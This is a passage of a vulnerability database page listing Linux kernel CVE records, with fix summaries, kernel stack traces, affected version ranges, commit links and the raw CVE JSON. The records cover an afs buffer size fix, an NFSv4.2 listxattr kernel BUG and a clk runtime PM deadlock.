                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nafs: Increase buffer size in afs_update_volume_status()\n\nThe max length of volume-\u003evid value is 20 characters.\nSo increase idbuf[] size up to 24 to avoid overflow.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\n[DH: Actually, it\u0027s 20 + NUL, so increase it to 24 and use snprintf()]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:55:15.534Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/d9b5e2b7a8196850383c70d099bfd39e81ab6637"
        },
        {
          "url": "https://git.kernel.org/stable/c/e56662160fc24d28cb75ac095cc6415ae1bda43e"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8530b170e464017203e3b8c6c49af6e916aece1"
        },
        {
          "url": "https://git.kernel.org/stable/c/6e6065dd25b661420fac19c34282b6c626fcd35e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d34a5e57632bb5ff825196ddd9a48ca403626dfa"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d"
        }
      ],
      "title": "afs: Increase buffer size in afs_update_volume_status()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26736",
    "datePublished": "2024-04-03T17:00:22.693Z",
    "dateReserved": "2024-02-19T14:20:24.166Z",
    "dateUpdated": "2025-05-04T08:55:15.534Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26870 (GCVE-0-2024-26870)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102

Summary

In the Linux kernel, the following vulnerability has been resolved: NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102 A call to listxattr() with a buffer size = 0 returns the actual size of the buffer needed for a subsequent call. When size > 0, nfs4_listxattr() does not return an error because either generic_listxattr() or nfs4_listxattr_nfs4_label() consumes exactly all the bytes then size is 0 when calling nfs4_listxattr_nfs4_user() which then triggers the following kernel BUG: [ 99.403778] kernel BUG at mm/usercopy.c:102! [ 99.404063] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP [ 99.408463] CPU: 0 PID: 3310 Comm: python3 Not tainted 6.6.0-61.fc40.aarch64 #1 [ 99.415827] Call trace: [ 99.415985] usercopy_abort+0x70/0xa0 [ 99.416227] __check_heap_object+0x134/0x158 [ 99.416505] check_heap_object+0x150/0x188 [ 99.416696] __check_object_size.part.0+0x78/0x168 [ 99.416886] __check_object_size+0x28/0x40 [ 99.417078] listxattr+0x8c/0x120 [ 99.417252] path_listxattr+0x78/0xe0 [ 99.417476] __arm64_sys_listxattr+0x28/0x40 [ 99.417723] invoke_syscall+0x78/0x100 [ 99.417929] el0_svc_common.constprop.0+0x48/0xf0 [ 99.418186] do_el0_svc+0x24/0x38 [ 99.418376] el0_svc+0x3c/0x110 [ 99.418554] el0t_64_sync_handler+0x120/0x130 [ 99.418788] el0t_64_sync+0x194/0x198 [ 99.418994] Code: aa0003e3 d000a3e0 91310000 97f49bdb (d4210000) Issue is reproduced when generic_listxattr() returns 'system.nfs4_acl', thus calling lisxattr() with size = 16 will trigger the bug. Add check on nfs4_listxattr() to return ERANGE error when it is called with size > 0 and the return value is greater than size.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4403438eaca6e91f0…
	https://git.kernel.org/stable/c/9d52865ff28245fc2…
	https://git.kernel.org/stable/c/06e828b3f1b206de0…
	https://git.kernel.org/stable/c/79cdcc765969d23f4…
	https://git.kernel.org/stable/c/80365c9f96015bbf0…
	https://git.kernel.org/stable/c/23bfecb4d852751d5…
	https://git.kernel.org/stable/c/251a658bbfceafb4d…

Impacted products

Vendor

Product

Version

Linux

Affected: 012a211abd5db098094ce429de5f046368391e68 , < 4403438eaca6e91f02d272211c4d6b045092396b (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 9d52865ff28245fc2134da9f99baff603a24407a (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 06e828b3f1b206de08ef520fc46a40b22e1869cb (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 79cdcc765969d23f4e3d6ea115660c3333498768 (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 80365c9f96015bbf048fdd6c8705d3f8770132bf (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 23bfecb4d852751d5e403557dd500bb563313baf (git)
Affected: 012a211abd5db098094ce429de5f046368391e68 , < 251a658bbfceafb4d58c76b77682c8bf7bcfad65 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26870",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:56:13.503124Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:37.605Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:04.235Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4403438eaca6e91f02d272211c4d6b045092396b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d52865ff28245fc2134da9f99baff603a24407a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/06e828b3f1b206de08ef520fc46a40b22e1869cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79cdcc765969d23f4e3d6ea115660c3333498768"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80365c9f96015bbf048fdd6c8705d3f8770132bf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23bfecb4d852751d5e403557dd500bb563313baf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/251a658bbfceafb4d58c76b77682c8bf7bcfad65"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nfs/nfs4proc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4403438eaca6e91f02d272211c4d6b045092396b",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "9d52865ff28245fc2134da9f99baff603a24407a",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "06e828b3f1b206de08ef520fc46a40b22e1869cb",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "79cdcc765969d23f4e3d6ea115660c3333498768",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "80365c9f96015bbf048fdd6c8705d3f8770132bf",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "23bfecb4d852751d5e403557dd500bb563313baf",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            },
            {
              "lessThan": "251a658bbfceafb4d58c76b77682c8bf7bcfad65",
              "status": "affected",
              "version": "012a211abd5db098094ce429de5f046368391e68",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nfs/nfs4proc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102\n\nA call to listxattr() with a buffer size = 0 returns the actual\nsize of the buffer needed for a subsequent call. When size \u003e 0,\nnfs4_listxattr() does not return an error because either\ngeneric_listxattr() or nfs4_listxattr_nfs4_label() consumes\nexactly all the bytes then size is 0 when calling\nnfs4_listxattr_nfs4_user() which then triggers the following\nkernel BUG:\n\n  [   99.403778] kernel BUG at mm/usercopy.c:102!\n  [   99.404063] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n  [   99.408463] CPU: 0 PID: 3310 Comm: python3 Not tainted 6.6.0-61.fc40.aarch64 #1\n  [   99.415827] Call trace:\n  [   99.415985]  usercopy_abort+0x70/0xa0\n  [   99.416227]  __check_heap_object+0x134/0x158\n  [   99.416505]  check_heap_object+0x150/0x188\n  [   99.416696]  __check_object_size.part.0+0x78/0x168\n  [   99.416886]  __check_object_size+0x28/0x40\n  [   99.417078]  listxattr+0x8c/0x120\n  [   99.417252]  path_listxattr+0x78/0xe0\n  [   99.417476]  __arm64_sys_listxattr+0x28/0x40\n  [   99.417723]  invoke_syscall+0x78/0x100\n  [   99.417929]  el0_svc_common.constprop.0+0x48/0xf0\n  [   99.418186]  do_el0_svc+0x24/0x38\n  [   99.418376]  el0_svc+0x3c/0x110\n  [   99.418554]  el0t_64_sync_handler+0x120/0x130\n  [   99.418788]  el0t_64_sync+0x194/0x198\n  [   99.418994] Code: aa0003e3 d000a3e0 91310000 97f49bdb (d4210000)\n\nIssue is reproduced when generic_listxattr() returns \u0027system.nfs4_acl\u0027,\nthus calling lisxattr() with size = 16 will trigger the bug.\n\nAdd check on nfs4_listxattr() to return ERANGE error when it is\ncalled with size \u003e 0 and the return value is greater than size."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:29.764Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4403438eaca6e91f02d272211c4d6b045092396b"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d52865ff28245fc2134da9f99baff603a24407a"
        },
        {
          "url": "https://git.kernel.org/stable/c/06e828b3f1b206de08ef520fc46a40b22e1869cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/79cdcc765969d23f4e3d6ea115660c3333498768"
        },
        {
          "url": "https://git.kernel.org/stable/c/80365c9f96015bbf048fdd6c8705d3f8770132bf"
        },
        {
          "url": "https://git.kernel.org/stable/c/23bfecb4d852751d5e403557dd500bb563313baf"
        },
        {
          "url": "https://git.kernel.org/stable/c/251a658bbfceafb4d58c76b77682c8bf7bcfad65"
        }
      ],
      "title": "NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26870",
    "datePublished": "2024-04-17T10:27:30.756Z",
    "dateReserved": "2024-02-19T14:20:24.184Z",
    "dateUpdated": "2025-05-04T08:58:29.764Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27004 (GCVE-0-2024-27004)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:28 – Updated: 2025-11-04 17:16

Title

clk: Get runtime PM before walking tree during disable_unused

Summary

In the Linux kernel, the following vulnerability has been resolved: clk: Get runtime PM before walking tree during disable_unused Doug reported [1] the following hung task: INFO: task swapper/0:1 blocked for more than 122 seconds. Not tainted 5.15.149-21875-gf795ebc40eb8 #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:swapper/0 state:D stack: 0 pid: 1 ppid: 0 flags:0x00000008 Call trace: __switch_to+0xf4/0x1f4 __schedule+0x418/0xb80 schedule+0x5c/0x10c rpm_resume+0xe0/0x52c rpm_resume+0x178/0x52c __pm_runtime_resume+0x58/0x98 clk_pm_runtime_get+0x30/0xb0 clk_disable_unused_subtree+0x58/0x208 clk_disable_unused_subtree+0x38/0x208 clk_disable_unused_subtree+0x38/0x208 clk_disable_unused_subtree+0x38/0x208 clk_disable_unused_subtree+0x38/0x208 clk_disable_unused+0x4c/0xe4 do_one_initcall+0xcc/0x2d8 do_initcall_level+0xa4/0x148 do_initcalls+0x5c/0x9c do_basic_setup+0x24/0x30 kernel_init_freeable+0xec/0x164 kernel_init+0x28/0x120 ret_from_fork+0x10/0x20 INFO: task kworker/u16:0:9 blocked for more than 122 seconds. Not tainted 5.15.149-21875-gf795ebc40eb8 #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u16:0 state:D stack: 0 pid: 9 ppid: 2 flags:0x00000008 Workqueue: events_unbound deferred_probe_work_func Call trace: __switch_to+0xf4/0x1f4 __schedule+0x418/0xb80 schedule+0x5c/0x10c schedule_preempt_disabled+0x2c/0x48 __mutex_lock+0x238/0x488 __mutex_lock_slowpath+0x1c/0x28 mutex_lock+0x50/0x74 clk_prepare_lock+0x7c/0x9c clk_core_prepare_lock+0x20/0x44 clk_prepare+0x24/0x30 clk_bulk_prepare+0x40/0xb0 mdss_runtime_resume+0x54/0x1c8 pm_generic_runtime_resume+0x30/0x44 __genpd_runtime_resume+0x68/0x7c genpd_runtime_resume+0x108/0x1f4 __rpm_callback+0x84/0x144 rpm_callback+0x30/0x88 rpm_resume+0x1f4/0x52c rpm_resume+0x178/0x52c __pm_runtime_resume+0x58/0x98 __device_attach+0xe0/0x170 device_initial_probe+0x1c/0x28 bus_probe_device+0x3c/0x9c device_add+0x644/0x814 mipi_dsi_device_register_full+0xe4/0x170 devm_mipi_dsi_device_register_full+0x28/0x70 ti_sn_bridge_probe+0x1dc/0x2c0 auxiliary_bus_probe+0x4c/0x94 really_probe+0xcc/0x2c8 __driver_probe_device+0xa8/0x130 driver_probe_device+0x48/0x110 __device_attach_driver+0xa4/0xcc bus_for_each_drv+0x8c/0xd8 __device_attach+0xf8/0x170 device_initial_probe+0x1c/0x28 bus_probe_device+0x3c/0x9c deferred_probe_work_func+0x9c/0xd8 process_one_work+0x148/0x518 worker_thread+0x138/0x350 kthread+0x138/0x1e0 ret_from_fork+0x10/0x20 The first thread is walking the clk tree and calling clk_pm_runtime_get() to power on devices required to read the clk hardware via struct clk_ops::is_enabled(). This thread holds the clk prepare_lock, and is trying to runtime PM resume a device, when it finds that the device is in the process of resuming so the thread schedule()s away waiting for the device to finish resuming before continuing. The second thread is runtime PM resuming the same device, but the runtime resume callback is calling clk_prepare(), trying to grab the prepare_lock waiting on the first thread. This is a classic ABBA deadlock. To properly fix the deadlock, we must never runtime PM resume or suspend a device with the clk prepare_lock held. Actually doing that is near impossible today because the global prepare_lock would have to be dropped in the middle of the tree, the device runtime PM resumed/suspended, and then the prepare_lock grabbed again to ensure consistency of the clk tree topology. If anything changes with the clk tree in the meantime, we've lost and will need to start the operation all over again. Luckily, most of the time we're simply incrementing or decrementing the runtime PM count on an active device, so we don't have the chance to schedule away with the prepare_lock held. Let's fix this immediate problem that can be ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/253ab38d1ee652a59…
	https://git.kernel.org/stable/c/4af115f1a20a3d909…
	https://git.kernel.org/stable/c/a29ec0465dce0b871…
	https://git.kernel.org/stable/c/a424e713e0cc33d4b…
	https://git.kernel.org/stable/c/60ff482c4205a5aac…
	https://git.kernel.org/stable/c/11555486229439759…
	https://git.kernel.org/stable/c/e581cf5d216289ef2…

Impacted products

Vendor

Product

Version

Linux

Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < 253ab38d1ee652a596942156978a233970d185ba (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < 4af115f1a20a3d9093586079206ee37c2ac55123 (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < a29ec0465dce0b871003698698ac6fa92c9a5034 (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < a424e713e0cc33d4b969cfda25b9f46df4d7b5bc (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < 60ff482c4205a5aac3b0595ab794cfd62295dab5 (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < 115554862294397590088ba02f11f2aba6d5016c (git)
Affected: 9a34b45397e5a389e25a0c5d39983300d040e5e2 , < e581cf5d216289ef292d1a4036d53ce90e122469 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27004",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:40:33.489522Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:46:18.836Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:29.861Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/253ab38d1ee652a596942156978a233970d185ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4af115f1a20a3d9093586079206ee37c2ac55123"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a29ec0465dce0b871003698698ac6fa92c9a5034"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a424e713e0cc33d4b969cfda25b9f46df4d7b5bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/60ff482c4205a5aac3b0595ab794cfd62295dab5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/115554862294397590088ba02f11f2aba6d5016c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e581cf5d216289ef292d1a4036d53ce90e122469"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/clk.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "253ab38d1ee652a596942156978a233970d185ba",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "4af115f1a20a3d9093586079206ee37c2ac55123",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "a29ec0465dce0b871003698698ac6fa92c9a5034",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "a424e713e0cc33d4b969cfda25b9f46df4d7b5bc",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "60ff482c4205a5aac3b0595ab794cfd62295dab5",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "115554862294397590088ba02f11f2aba6d5016c",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            },
            {
              "lessThan": "e581cf5d216289ef292d1a4036d53ce90e122469",
              "status": "affected",
              "version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/clk.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
